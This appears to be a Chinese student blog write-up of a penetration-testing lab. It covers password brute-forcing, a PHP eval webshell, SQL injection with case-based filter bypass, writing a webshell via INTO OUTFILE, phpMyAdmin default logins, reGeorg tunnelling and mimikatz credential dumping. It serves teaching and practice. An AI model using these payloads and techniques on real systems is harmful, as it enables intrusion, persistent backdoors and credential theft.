+++
title = "Ex6"
date = 2022-04-20
categories = ["网络安全实验"]
draft = false
author = "Logic"
+++

## 实验过程 {#实验过程}


### 任务一 {#任务一}

查看操作机的内网ip地址为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420PR49so.png" >}}

首先扫描网段中的存活主机，扫描192.168.1.0/24网段，得到存活主机为192.168.1.10：

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420fO4t25.png" >}}

扫描存活主机的端口信息为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420QM3q2K.png" >}}

可见目标主机开放了80端口，故推测目标主机上设有网站，使用wwwscan对目标网站的后台地址进行扫描，扫描结果为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/04204551FE.png" >}}

得知后台管理页面的路径，访问该页面查看内容

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420xX6lyR.png" >}}

在浏览器中配置网络代理，并使用burpsuite截取登陆数据包，使用一般管理员的用户名admin，密码随意

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420rGHbkF.png" >}}

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/042099tuqn.png" >}}

截取到了对应的数据包，将其送至爆破模块中，使用文件夹中的最常用100个密码的文本文件作为字典，开始爆破

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420hPzpxO.png" >}}

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420eHRLH9.png" >}}

可以看到这个请求得到的返回数据包的长度与其他的不同，故可断定密码为1q2w3e4r，尝试使用改密码登陆后台

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420jU0Gtg.png" >}}

登陆成功，flag为flag1{5d41402abc4b2a76b9719d911017c592}

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420jU0Gtg.png" >}}

上传工具文件夹中的一句话木马

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420Wvgx71.png" >}}

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420WQ9fKD.png" >}}

使用中国菜刀连接一句话木马

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420Ww5Hok.png" >}}

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420RZ8BMy.png" >}}

可以看到已经成功连接一句话木马并且看到了网站的后台文件夹


### 任务二 {#任务二}

尝试使用sql注入，首先进入sql页面，可以看到当前页面的数据是执行sql语句得来的，首先尝试判断是否有sql注入，使用最为经典的单引号判断法，在参数后加'，结果为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420gYq9u4.png" >}}

页面返回错误，故存在sql注入，这是因为无论字符型还是整型都会因为单引号个数不匹配而报错。接下来判断是字符型Sql注入还是数字型sql注入。尝试在参数后添加 `id=1 and 1=1#` (末尾加#注释掉服务端构造的sql语句后面的句子)，页面报错，显示有语法错误

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420tr5YP4.png" >}}

尝试添加 `id=1 or 1=1#` ，页面显示正常

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420hyG4H6.png" >}}

故可推测网站过滤了请求中的and字符，因为在sql中大小写不敏感，故尝试使用大写的AND，添加 `id=1 AND 1=1#` ，页面返回正常

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420km5WRA.png" >}}

尝试AND 1=2#，页面正常返回但没有数据，说明执行成功但逻辑错误，应该为数字型sql注入

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420z1dg38.png" >}}

接着尝试找出该数据表有多少列，从页面数据可知该表至少有三列，故从4开始尝试，语句为 `id=1 order by 4#` 将4递增，直到11报错，显示查询失败，故有10列

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420PzAOUe.png" >}}

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420JmByz2.png" >}}

尝试执行联合查询，请求为 `id=1 union select 1,2,3,4,5,6,7,8,9,10#` 。仍然错误，且信息和and类似，故可推测union及select也被过滤，同样尝试使用大写来绕过

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420rls06M.png" >}}

使用 `id=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10#` 结果为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420DMJ7Jz.png" >}}

故可知可以用来显示的位置为1(显示在用户ID一栏中)和3(显示在用户账号一栏中)
此时我们在1，3位置将1，3替换为user()和database()。构造后的参数为 `id=1 UNION SELECT user(),2,database(),3,4,5,6,7,8,9,10#`

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420Q0WetR.png" >}}

可以发现用户为root，数据库名为dedecmsv57utf8sp1。考虑到Apache的配置文件在centos下一般为 `/etc/httpd/conf/httpd.conf` ，故可以通过load_file来读取文件的内容，参数为 `id=1 UNION SELECT 1,2,load_file('/etc/httpd/conf/httpd/conf')` ，查看结果

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420CioQdV.png" >}}

Apache 配置文件的内容已经显示了出来，因为在Apache配置文件中，网站根目录一般在配置项DocumentRoot后面，故我们在网页上搜索root，可以找到根目录对应的内容

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420lSwH5Y.png" >}}

可见网站的根目录为 `/var/www/html`
我们通过INTO OUTFILE来向文件中写入一句话木马，构造参数为 `id=1 UNION SELECT 1,'<?php eval($_POST[a]);?>',3,4,5,6,7,8,9,10 INTO OUTFILE '/var/www/html/myshell.php'#` 结果为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420jtbEvZ.png" >}}

根据刚才的经验我们可以知道大概率是一句话木马中某些字符被过滤掉了，绕过这种字符过滤有很多方法，如将字符转换为16进制，将字符转换为URL编码等。这里我们尝试URL编码，使用在线工具将一句话木马转换为URL编码。如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/04203TgOch.png" >}}

执行，得到的结果如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420oN3Rty.png" >}}

可见转换出现了一些问题，故我们改用16进制的形式写入一句话木马。同样使用在线转换将一句话木马转换为16进制字符串，转换结果为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/04208Xr2il.png" >}}

将该16进制串传入参数，发送请求

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420czDYVz.png" >}}

可见写入成功，使用菜刀连接

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/04204x8PrZ.png" >}}

填入一句话木马文件和请求参数，连接成功，查看根目录下的文件

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/042065oq4j.png" >}}

可以看到flag文件，查看其内容为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420QBlsDS.png" >}}

flag为 `flag3{fd5d4d5a199e9e8bfadead5f5e52895a}`


### 任务三 {#任务三}

查看之前扫描网站目录的结果

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/042090J9xV.png" >}}

可推测该网址为phpmyadmin的登陆页面，查看该网址，得到

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420ti4Yju.png" >}}

可见确实为phpmyadmin的登陆页面，phpmyadmin的默认用户名和密码均为root，我们使用默认用户名和密码尝试登陆

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/04203lWdV3.png" >}}

登陆成功，执行sql语句查看httpd配置文件的内容

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0420VuWdjw.png" >}}

可见内容类型为blob，打开选项，显示blob内容

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/04205ebZtZ.png" >}}

可见成功显示了httpd配置文件的内容，同样通过查找找到网站的根目录为 `/var/www/html` ，在localhost执行sql查询写入一句话木马到myadmin.php文件，因为没有过滤，故可以直接将一句话木马写入，如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421fq8RQi.png" >}}

使用菜刀连接

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421CZoii9.png" >}}

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421pkJKX6.png" >}}

连接成功在phpmyadmin中打开第一个数据库，根据表明搜索flag表，如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421HJi37x.png" >}}

得到flag为 `flag2{912ec803b2ce49e4a541068d495ab570}`


### 任务四 {#任务四}

使用菜刀上传内网扫描脚本到web的机器上，内网扫描的脚本文件在工具文件夹下的web端口扫描中。为RASscan.py文件，我们查看其文件内容可以得知其使用方法为 `./RASscan.py 192.168.2.1 192.168.2.254 -t 20`

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421UfGwRk.png" >}}

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421irO4fv.png" >}}

使用菜刀查看上传的文件，并用菜刀打开一个虚拟终端

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421vMK9Ty.png" >}}

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/04217tkglW.png" >}}

可见文件已经成功上传，执行内网扫描脚本扫描内网

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421OAzRWC.png" >}}

由python文件的内容可知扫描结果保存在log.txt文件中，使用菜刀将log.txt文件下载下来并查看

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421IdEVgL.png" >}}

可见扫描到了内网中的192.168.2.10 主机和192.168.2.11主机，且都开放了3389端口，上传reGeorg来开启代理服务，查看reGeorg文件夹中的readme文件，可以看到reGeorg的用法

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421JRJTk2.png" >}}

首先上传tunnel文件到服务端，这里我们选择php文件。然后上传tunnel和reGeorg文件

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421hbD4GW.png" >}}

在网页中访问tunnel.php文件，没有响应，我们使用burp suite查看返回的数据包显示500，说明php代码有错误，经过查阅资料可知服务端php不支持socket,注意到工具reGeorg文件夹下还有一个nosocket的php文件，我们将这个文件上传到服务端，访问该文件，得到
![](https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421sKLn5d.png)
可见tunnel成功建立，在操作机上使用reGeorg设置对应的端口和tunnel文件
![](https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421zqCGcJ.png)
可见tunnel建立成功，这时已经可以使用代理来进行访问了。继续使用proxifier工具配置代理，新建一个代理配置，ip为127.0.0.1，端口为刚才设置监听的端口，这里是6677。
![](https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421rWy1Fq.png)
配置代理规则，这里我们将所有数据包都通过代理发送，同时排除python脚本自身
![](https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421mU2XYe.png)
通过远程桌面连接连接到192.168.2.11主机上，发现我们不了解远程主机的管理员密码，回想之前在尝试sql注入的时候，看到过dede_admin表中的数据，有两个用户账号，一个是admin，另外一个是administrator，故很有可能是管理员密码，我们在phpmyadmin中找到这个表，查看其中的内容
![](https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421xRuJ8R.png)
可见密码为topsec.123，我们尝试使用这个密码登录，登陆成功
![](https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421yTg7X9.png)
查看C盘根目录下的flag文本文件的内容为 `flag4{238fb735876083b832229d279b995062}`
![](https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421sHTMPD.png)


### 任务五 {#任务五}

使用mimikatz在之前远程桌面登陆的机器上抓取密码在这之前我们先要了解一下什么是windows域和域控

> 域(Domain)是Windows网络中独立运行的单位，域之间相互访问则需要建立信任关系。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后，2个域之间不但可以按需要相互进行管理，还可以跨网分配文件和打印机等设备资源，使不同的域之间实现网络资源的共享与管理，以及相互通信和数据传输。

<!--quoteend-->

> 域控即域控制器（Domain controller，简称DC）是指在计算机网络域内响应安全身份认证请求的网络服务器，负责允许发出请求的主机访问域内资源，以及对用户进行身份验证，存储用户账户信息，并执行域的安全策略。

可见在域控主机上存储着域内所有主机的用户账户信息，在验证用户身份的过程中要使用用户的账户名和密码，而mimikatz这个工具的强大之处就在于，通过它你可以提升进程权限注入进程读取进程内存，当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码。同样也可以获取其他进程中的账户名和密码。因此结合mimikatz我们就可以得到在这个域下主机的账户名和密码。下面进行尝试。首先将mimikatz上传到目标机器上，这里我们可以通过在远程桌面连接时将本地主机的硬盘挂载到连接的远程主机上来访问本地主机中的文件
![](https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421ayUYEF.png)
将mimikatz文件拷贝到远程主机的硬盘中即可。
![](https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/04216cKybF.png)
以管理员运行mimikatz， 提升权限
![](https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421JS7Hsq.png)
抓取密码 `sekurlsa::logonPasswords`
![](https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421mEAv0z.png)
我们已知本机的域为simple-PC，我们尝试使用simple-PC域中的用户Administrator和密码topsec.123登陆192.168.2.10，失败。发现还抓取到了另外一个域即TEST域中的用户名Administrator和密码Simplexue123
![](https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/04218dQXQU.png)
我们使用该密码登陆192.168.2.10，登陆成功(这里如果要指定使用某个域中的用户名可以使用TEST/Administrator作为用户名登陆，这样就指定了TEST域下的Administrator用户)。查看C盘根目录下的flag文本文件的内容为 `flag5{6aa16f9b07f2d00b16b94aa797488b38}`
![](https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0421qsk77l.png)
